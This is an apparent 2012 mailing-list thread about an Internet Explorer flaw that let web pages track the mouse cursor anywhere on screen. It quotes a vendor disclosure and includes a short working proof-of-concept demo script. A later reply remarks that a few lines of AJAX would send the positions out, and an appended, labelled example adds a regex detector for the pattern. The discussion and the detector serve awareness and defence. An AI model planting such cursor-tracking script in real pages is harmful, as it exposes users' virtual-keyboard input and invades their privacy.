Hans-Christian Andersen
hans.andersen at phulse.com
Thu Dec 13 14:36:33 CST 2012
> The choice now is either stop using all tablets and Smartphones or stop
> using IE until a universal fix is built and distributed. Better safe than
> sorry.
All tablets and smartphones?
- Hans
On 2012-12-13, at 12:32 PM, "Jim Lawrence" <accessd at shaw.ca> wrote:
> You mean this demo?
>
> <!DOCTYPE html>
> <html>
> <head>
>   <meta charset="utf-8" />
>   <title>Exploit Demo</title>
>   <script type="text/javascript">
>     window.attachEvent("onload", function() {
>       var detector = document.getElementById("detector");
>       detector.attachEvent("onmousemove", function (e) {
>         detector.innerHTML = e.screenX + ", " + e.screenY;
>       });
>       setInterval(function () {
>         detector.fireEvent("onmousemove");
>       }, 100);
>     });
>   </script>
> </head>
> <body>
>   <div id="detector"></div>
> </body>
> </html>
>
> These types of compromise should be out there so everyone knows them, as rest
> assured, every person in the malware business is already fully versed in
> this exploit. Really it is only four to five lines of code and not
> particularly difficult code. You would have to add an AJAX piece of code to
> collect the positions remotely of course but that would also be less than
> ten lines of additional code; four lines if you have attached the jQuery
> library.
>
> The choice now is either stop using all tablets and Smartphones or stop
> using IE until a universal fix is built and distributed. Better safe than
> sorry.
>
> Jim
>
> -----Original Message-----
> From: dba-tech-bounces at databaseadvisors.com
> [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Hans-Christian
> Andersen
> Sent: Thursday, December 13, 2012 1:18 AM
> To: Discussion of Hardware and Software issues
> Subject: [dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)
>
>
> http://spider.io/blog/2012/12/internet-explorer-data-leakage/
>
> This is a pretty severe security issue. All it takes is a little bit of
> javascript on any site you visit and they are able to fully track where your
> mouse is on your screen (even when IE is minimized). All versions of IE are
> vulnerable to this starting from IE 6. It's already being exploited in the
> wild.
>
> There is a demo included as a link, if you want to test this out yourself.
>
> - Hans
>
>
> Excerpt from link:
> _______________
>
> "On the 1st of October, 2012, we disclosed to Microsoft the following
> security vulnerability in Internet Explorer, versions 6-10, which allows
> your mouse cursor to be tracked anywhere on the screen, even if the Internet
> Explorer window is minimised. The vulnerability is particularly troubling
> because it compromises the security of virtual keyboards and virtual
> keypads.
>
> The motivation for using a virtual keyboard is typically that it reduces the
> chance of a keylogger recording one's keypresses and thereby compromising
> one's passwords or credit card details. (c.f. bit.ly/YnNBYE; bit.ly/VpapWf)
>
> Whilst the Microsoft Security Research Center has acknowledged the
> vulnerability in Internet Explorer, they have also stated that there are no
> immediate plans to patch this vulnerability in existing versions of the
> browser. It is important for users of Internet Explorer to be made aware of
> this vulnerability and its implications.
>
> The vulnerability is already being exploited by at least two display ad
> analytics companies across billions of page impressions per month."
>
>
> _______________________________________________
> dba-Tech mailing list
> dba-Tech at databaseadvisors.com
> http://databaseadvisors.com/mailman/listinfo/dba-tech
> Website: http://www.databaseadvisors.com
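
Added example, not part of the original thread or of the spider.io post: a heuristic static check that flags pages whose inline script combines the two traits of the quoted demo, a synthetic mouse event raised with fireEvent and a read of screenX/screenY, and notes whether it is driven from a timer. The rule ids and function names are hypothetical, DEMO is the script from the quoted message, and BENIGN is a constructed sample.

```javascript
// Added example: heuristic static check for the pattern in the quoted demo.
// Rule ids and function names are hypothetical, not from any real tool.
const RULES = [
  { id: "reads-screen-coords", re: /\.screen[XY]\b/ },
  { id: "synthetic-mouse-event", re: /\.fireEvent\s*\(\s*["']on(mouse\w+|click|dblclick)["']/i },
  { id: "timer-loop", re: /\bset(Interval|Timeout)\s*\(/ },
];

// Pull the bodies of inline <script> blocks out of an HTML string.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Strip JS comments so commented-out code does not trigger a rule.
function stripComments(js) {
  return js.replace(/\/\*[\s\S]*?\*\//g, "").replace(/(^|[^:])\/\/.*$/gm, "$1");
}

// Flag a page only when it both raises synthetic mouse events and reads
// screen coordinates; "polled" adds that a timer is present as well.
function scanPage(html) {
  const js = inlineScripts(html).map(stripComments).join("\n");
  const hits = RULES.filter(r => r.re.test(js)).map(r => r.id);
  const suspicious = hits.includes("reads-screen-coords") && hits.includes("synthetic-mouse-event");
  return { suspicious, polled: suspicious && hits.includes("timer-loop"), hits };
}

// Script taken from the demo quoted in the message above.
const DEMO = `<script type="text/javascript">
window.attachEvent("onload", function() {
  var detector = document.getElementById("detector");
  detector.attachEvent("onmousemove", function (e) {
    detector.innerHTML = e.screenX + ", " + e.screenY;
  });
  setInterval(function () { detector.fireEvent("onmousemove"); }, 100);
});
</script>`;

// Constructed sample: a genuine handler, with the fireEvent call commented out.
const BENIGN = `<script>
document.attachEvent("onmousemove", function (e) { status.innerHTML = e.screenX; });
// el.fireEvent("onmousemove");
</script>`;

console.log(scanPage(DEMO), scanPage(BENIGN));
```

The check is regex-based, so it only sees inline, unobfuscated script and is a triage aid rather than proof either way.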